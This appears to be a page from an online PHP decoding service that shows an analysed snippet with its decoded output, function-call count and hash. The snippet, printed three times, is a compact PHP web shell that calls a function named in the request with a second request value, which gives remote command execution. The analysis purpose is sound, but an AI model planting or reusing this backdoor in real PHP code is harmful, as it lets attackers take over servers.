Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']); ?>..

Decoded Output download

<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?>

Function Calls

register_shutdown_function 1

Variables

$e None

Stats

MD5 9f7f05ac2a57f3cf0e5263d0459cd523
Eval Count 0
Decode Time 124 ms